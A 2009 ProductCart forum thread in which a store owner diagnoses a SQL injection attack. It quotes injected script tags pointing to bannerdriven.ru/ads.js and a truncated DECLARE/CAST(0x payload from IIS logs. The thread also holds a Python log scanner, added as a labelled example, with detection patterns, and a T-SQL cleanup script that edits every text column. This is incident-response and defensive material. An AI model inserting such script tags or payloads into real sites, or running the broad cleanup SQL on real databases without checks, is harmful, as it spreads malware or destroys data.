
SQL injection victim?

Printed From: ProductCart E-Commerce Solutions
Category: ProductCart
Forum Name: Using ProductCart
Forum Description: Running your store with ProductCart
URL: https://forum.productcart.com/forum_posts.asp?TID=3062
Printed Date: 28-February-2025 at 1:44pm
Software Version: Web Wiz Forums 12.04 - http://www.webwizforums.com


Topic: SQL injection victim?
Posted By: BrianRoden
Subject: SQL injection victim?
Date Posted: 25-September-2009 at 12:23pm
This morning our ProductCart 3.51 store was taking forever to load. When the home page finally came up, all the buttons under the featured items were red X's with text, which threw our columns totally off.
 
I right-clicked on the box where the button should be and looked at properties. After the .gif in the image filename was some script pointing to bannerdriven.ru/ads.js. I started digging around. The layout and icons tables had been modified with this script at the end of each value. The pcStoreSettings had also been altered with these script tags inserted into various fields:
 

Store closed message: The store is temporarily closed so we can perform a software upgrade. Please try back after 10:00 a.m. CDT.<script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script>

SSL URL: https://www.ourregularurl.com<script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script>

Home page: <script src=http://www.bannerdriven.ru/ads.js></script><script src=http://www.bannerdriven.ru/ads.js></script>

More digging shows other tables have been affected, like Orders.

This looks like a SQL injection attack. We have the Windows firewall on the Win2008 web server where this site runs set to only allow direct SQL TCP/IP connections from the web server itself and our office's dedicated IP block (we use SQL replication for a couple of databases that drive other websites on this server)
 
I googled bannerdriven.ru and it looks like lots of sites have had their script injected into fields.



Replies:
Posted By: Hamish
Date Posted: 25-September-2009 at 12:43pm
Hi,
You will need to get the database restored from a backup and investigate the logs to see if you can determine the source of the breach. We are not aware of any exploitable vulnerabilities in ProductCart v3.51 code.

If you have made modifications please make sure the data is sanitized correctly, see
- http://wiki.earlyimpact.com/how_to/sanitize_strings

Also see
- http://wiki.earlyimpact.com/productcart/securityrec#stores_using_a_ms_sql_database

I would also recommend checking that no other files on the site have been modified.

Hamish


-------------
Editing ProductCart Code?

See the WIKI Guidelines for Editing ProductCart's ASP Source Code: http://wiki.earlyimpact.com/developers/editcode



Posted By: ProductCart
Date Posted: 25-September-2009 at 12:43pm
Brian,

we don't have any reports of any vulnerabilities in ProductCart v3.51. In our experience, the number one source of security holes is custom code:

- have you modified any of the source code?
- are you running any add-ons not provided by Early Impact?

Since some of the information might be confidential, we recommend that you open a support ticket.

-------------
The ProductCart Team

Home of ProductCart shopping cart software: http://www.productcart.com


Posted By: ProductCart
Date Posted: 25-September-2009 at 12:46pm
Two of us posted at the same time :-)

The idea is the same, as you can see. You need to review any modifications ever made to your ProductCart source code to ensure that they did not introduce a security issue.

-------------
The ProductCart Team

Home of ProductCart shopping cart software: http://www.productcart.com


Posted By: BrianRoden
Date Posted: 25-September-2009 at 1:21pm
Using GreyBeard's session saver add-in.
 
We've made minor mods to source code on some of our PC sites (we have 3). Rearranging layouts, changing the Continue Shopping button on the shopping cart page to go back to the category the user just bought from, instead of back to the home page.
 
We added an RSS feed as an ASPX app in a subfolder to display the newest products per category for people who want to subscribe to get updates on their craft of interest. It accesses the same DB and works off a URL that has a category ID passed in the query string. Wonder if someone used the RSS URL.
 
I'll check the IIS logs.


Posted By: ProductCart
Date Posted: 25-September-2009 at 1:29pm
Yes, the query string that carries the category ID would be the first thing to review. Incorrectly sanitizing a query string is normally the number one culprit for SQL injection.

-------------
The ProductCart Team

Home of ProductCart shopping cart software: http://www.productcart.com


Posted By: BrianRoden
Date Posted: 25-September-2009 at 1:43pm
The RSS feed is its own app in IIS, with its own separate log files, new file each day. The last log file was from 9/18/09. Doesn't look like this was the vector, or we would have had an entry for yesterday. We know yesterday is when the problem started, because Thursday night's DB backup was clean and we were able to restore it to get the DB back to normal.
 
Searching the IIS log for the PC site, the first occurrence of bannerdriven.ru shows up at 4:40 p.m. yesterday. I'm going to keep digging.


Posted By: BrianRoden
Date Posted: 25-September-2009 at 3:15pm
Found this page
 
http://www.sophos.com/blogs/sophoslabs/v/post/1329
 
then searched yesterday's IIS log for this site for the string SET%20 and found this
 

2009-09-24 16:40:03 W3SVC6487 servername se.rv.er.ip GET /cart/pc/viewCategories.asp idCategory=2;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4152452040542056 

(I've omitted the full string for security purposes)
 
I'll open a support ticket with the complete string


Posted By: BrianRoden
Date Posted: 25-September-2009 at 4:00pm
Found the problem. We had added some code in the footer.asp to check the current category and work back up the tree to the top-level category, then insert banner ad code from an Excel file based on the top-level category. I failed to check the idCategory with validNum, which allowed the stuff after the semicolon to get through.
 
I do most of my development in ASP.net, using object data source and parameterized queries with stored procedures that check stuff on the back end. Not used to doing it the classic ASP way.
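As an added example (not code from this thread, from ProductCart, or from Early Impact), here is a small Python scan over constructed IIS W3C log lines laid out in the field order of the line Brian quoted: it applies the strict all-digits check that the footer.asp code skipped to the idCategory/idproduct parameters, and also matches the DECLARE / SET @ / CAST(0x fragments he searched the log for. The log lines, the IP address and the parameter list are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample IIS W3C log lines in the field order of the line quoted in the thread
# (date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query).
# The CAST(0x...) payload is truncated exactly as Brian truncated it; the IP is made up.
SAMPLE_LOG = """\
2009-09-24 16:40:03 W3SVC6487 servername 192.0.2.10 GET /cart/pc/viewCategories.asp idCategory=2;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4152452040542056
2009-09-24 16:41:10 W3SVC6487 servername 192.0.2.10 GET /cart/pc/viewCategories.asp idCategory=7
2009-09-24 16:42:55 W3SVC6487 servername 192.0.2.10 GET /cart/pc/viewPrd.asp idproduct=12&idcategory=3
2009-09-24 16:43:30 W3SVC6487 servername 192.0.2.10 GET /cart/pc/viewCategories.asp idCategory=12abc
"""

# Query-string parameters assumed to carry numeric IDs (compared case-insensitively,
# because IIS logs the query exactly as the client sent it).
NUMERIC_PARAMS = {"idcategory", "idproduct"}

# Fragments of the stacked-query payload seen in the thread: DECLARE @.., SET @..=, CAST(0x..
SIGNATURES = [re.compile(p, re.IGNORECASE) for p in (
    r"\bDECLARE\s+@\w+", r"\bSET\s+@\w+\s*=", r"\bCAST\s*\(\s*0x[0-9A-F]+")]

def is_valid_num(value: str) -> bool:
    """Strict ASCII all-digits check: the validation the footer.asp code skipped."""
    return re.fullmatch(r"[0-9]+", value) is not None

def scan_line(line: str):
    """Return (time, uri-stem, reason) when the query looks hostile, else None."""
    fields = line.split(" ", 7)
    if len(fields) < 8:
        return None
    time_, stem, query = fields[1], fields[6], fields[7]
    decoded = unquote_plus(query)          # %20 -> space, so 'SET%20@S' becomes 'SET @S'
    for sig in SIGNATURES:                 # known payload fragments first
        if sig.search(decoded):
            return (time_, stem, "signature " + sig.pattern)
    for pair in decoded.split("&"):        # then the generic rule: ID parameters must be all digits
        name, _, value = pair.partition("=")
        if name.lower() in NUMERIC_PARAMS and not is_valid_num(value):
            return (time_, stem, f"non-numeric {name}={value!r}")
    return None

def scan_log(text: str):
    """Scan every non-comment line of a log; return the list of findings."""
    lines = (l for l in text.splitlines() if l and not l.startswith("#"))
    return [hit for hit in map(scan_line, lines) if hit]
```

The all-digits rule catches the fourth line even though no signature matches it, which is the point of validating the parameter rather than relying on payload patterns alone.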


Posted By: ProductCart
Date Posted: 25-September-2009 at 5:04pm
Hi Brian,

Thanks for updating the post with this information. It's a good reminder for everyone to make sure all database input is sanitized per the instructions on the following page from our WIKI:

http://wiki.earlyimpact.com/how_to/sanitize_strings

Sincerely,

Early Impact


-------------
The ProductCart Team

Home of ProductCart shopping cart software: http://www.productcart.com


Posted By: stsomeware
Date Posted: 06-October-2009 at 3:25pm
I have written a little SQL Query to clean up our database after an attack. I cannot guarantee it will work for anyone else, but I have run it on 2 separate ProductCart stores that I work with and it worked just fine without losing any data. You will just need to change the <script src=http://www.bannerdriven.ru/ads.js></script> to the link that has been injected into your database.
 
Here it is:
 

-- Walks every text / ntext / nvarchar / varchar column (xtype 35 / 99 / 231 / 167)
-- of every user table and strips the injected <script> tag from the end of each value.
-- Change the tag in the WHERE clause to the one injected into your database.
-- Each run removes one trailing tag per value, so run it again if the tag was appended twice.
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name, b.name
  FROM sysobjects a, syscolumns b
  WHERE a.id = b.id AND a.xtype = 'u'
    AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
  -- Keep everything before the last '<script' (located by searching the reversed string).
  EXEC(
    'update ['+@T+'] set ['+@C+'] = left(
       convert(varchar(8000), ['+@C+']),
       len(convert(varchar(8000), ['+@C+'])) - 6 -
       patindex(''%tpircs<%'', reverse(convert(varchar(8000), ['+@C+'])))
     )
     where ['+@C+'] like ''%<script src=http://www.bannerdriven.ru/ads.js></script>'''
  );
  FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;



